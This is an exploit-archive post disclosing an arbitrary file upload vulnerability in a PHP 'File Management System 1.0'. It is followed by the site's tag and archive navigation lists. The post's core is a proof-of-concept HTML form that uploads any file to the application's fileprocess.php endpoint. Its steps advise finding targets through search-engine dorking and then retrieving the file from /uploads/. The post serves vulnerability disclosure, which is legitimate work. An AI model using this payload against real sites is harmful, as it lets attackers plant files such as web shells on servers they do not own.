=============================================================================================================================================
| # Title     : File Management System 1.0 Arbitrary File upload Vulnerability                                                              |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |
| # Vendor    : https://www.campcodes.com/downloads/file-management-system-in-php-mysql-source-code/?wpdmdl=7992&refresh=66bba3bd946da1723573181                           |
=============================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Line 1 : Set your target.
[+] Save As poc.html
[+] Payload :
 <form name="" action="http://127.0.0.1/filemanagement/Private_Dashboard/fileprocess.php" method="POST" enctype="multipart/form-data">
    <!-- Hidden Email Input -->
    <input type="hidden" name="email" value="">
    <!-- File Input -->
    <label for="myfile">Upload File:</label>
    <input type="file" id="myfile" name="myfile" required>
    <!-- Submit Button -->
    <input type="submit" name="save" value="Save">
</form>
[+] /uploads/
    Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================

File Tags

• ActiveX (933)
• Advisory (86,567)
• Arbitrary (16,906)
• BBS (2,859)
• Bypass (1,878)
• CGI (1,034)
• Code Execution (7,840)
• Conference (691)
• Cracker (844)
• CSRF (3,412)
• DoS (25,123)
• Encryption (2,389)
• Exploit (53,308)
• File Inclusion (4,266)
• File Upload (1,001)
• Firewall (822)
• Info Disclosure (2,893)
• Intrusion Detection (916)
• Java (3,144)
• JavaScript (899)
• Kernel (7,242)
• Local (14,808)
• Magazine (587)
• Overflow (13,178)
• Perl (1,435)
• PHP (5,227)
• Proof of Concept (2,396)
• Protocol (3,731)
• Python (1,648)
• Remote (31,704)
• Root (3,639)
• Rootkit (528)
• Ruby (632)
• Scanner (1,657)
• Security Tool (8,031)
• Shell (3,281)
• Shellcode (1,217)
• Sniffer (902)
• Spoof (2,279)
• SQL Injection (16,629)
• TCP (2,444)
• Trojan (690)
• UDP (904)
• Virus (670)
• Vulnerability (33,023)
• Web (9,974)
• Whitepaper (3,782)
• x86 (967)
• XSS (18,267)
• Other

File Archives

• August 2024
• July 2024
• June 2024
• May 2024
• April 2024
• March 2024
• February 2024
• January 2024
• December 2023
• November 2023
• October 2023
• September 2023
• Older

Systems

• AIX (429)
• Apple (2,099)
• BSD (377)
• CentOS (58)
• Cisco (1,927)
• Debian (7,110)
• Fedora (1,693)
• FreeBSD (1,246)
• Gentoo (4,567)
• HPUX (880)
• iOS (378)
• iPhone (108)
• IRIX (220)
• Juniper (69)
• Linux (50,919)
• Mac OS X (691)
• Mandriva (3,105)
• NetBSD (256)
• OpenBSD (489)
• RedHat (16,636)
• Slackware (941)
• Solaris (1,611)
• SUSE (1,444)
• Ubuntu (9,782)
• UNIX (9,441)
• UnixWare (187)
• Windows (6,677)
• Other